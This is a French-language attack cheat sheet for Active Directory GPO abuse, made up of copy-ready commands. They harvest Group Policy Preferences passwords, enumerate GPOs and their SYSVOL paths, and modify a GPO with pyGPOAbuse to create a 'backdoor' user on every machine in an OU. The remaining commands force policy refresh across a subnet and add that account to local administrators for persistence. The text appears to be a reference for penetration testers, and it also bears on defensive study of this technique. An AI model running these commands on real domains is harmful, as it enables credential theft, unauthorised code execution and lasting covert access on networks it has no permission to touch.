Exploitation

GPO Abuse

Identifier et modifier des GPOs pour exécuter du code sur les machines d'une OU.

Enumération GPO

Copy command
nxc smb $DC -u $USER -p $PASS -M gpp_password

Description: Chercher des mots de passe dans les GPP : encore présents sur beaucoup d'environnements anciens.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get search --filter '(objectClass=groupPolicyContainer)' --attr displayName,gPCFileSysPath

Description: Lister les GPOs et leurs chemins SYSVOL pour identifier celles qu'on peut modifier.

Copy command
bloodhound-python -u $USER -p $PASS -d $DOMAIN -ns $DC -c GPO --zip

Description: Collecter les données GPO pour BloodHound : identifier les chemins de contrôle de GPO.

Modification GPO

Copy command
nxc smb $DC -u $USER -p $PASS -x 'gpresult /R'

Description: Vérifier quelles GPOs s'appliquent à la machine cible : identifier les GPOs contrôlables.

Copy command
pyGPOAbuse.py -u $USER -p $PASS -d $DOMAIN -dc-ip $DC -gpo-id '$GPO_ID' -command 'net user backdoor Pass123! /add'

Description: Modifier une GPO pour exécuter une commande sur les machines de l'OU cible au prochain refresh.

Copy command
nxc smb $CIDR -u $USER -p $PASS -x 'gpupdate /force'

Description: Forcer l'application immédiate de la GPO modifiée sur les machines cibles.

Copy command
nxc smb $DC -u $USER -p $PASS -x 'net localgroup administrators backdoor /add'

Description: Ajouter le backdoor créé aux admins locaux pour maintenir l'accès.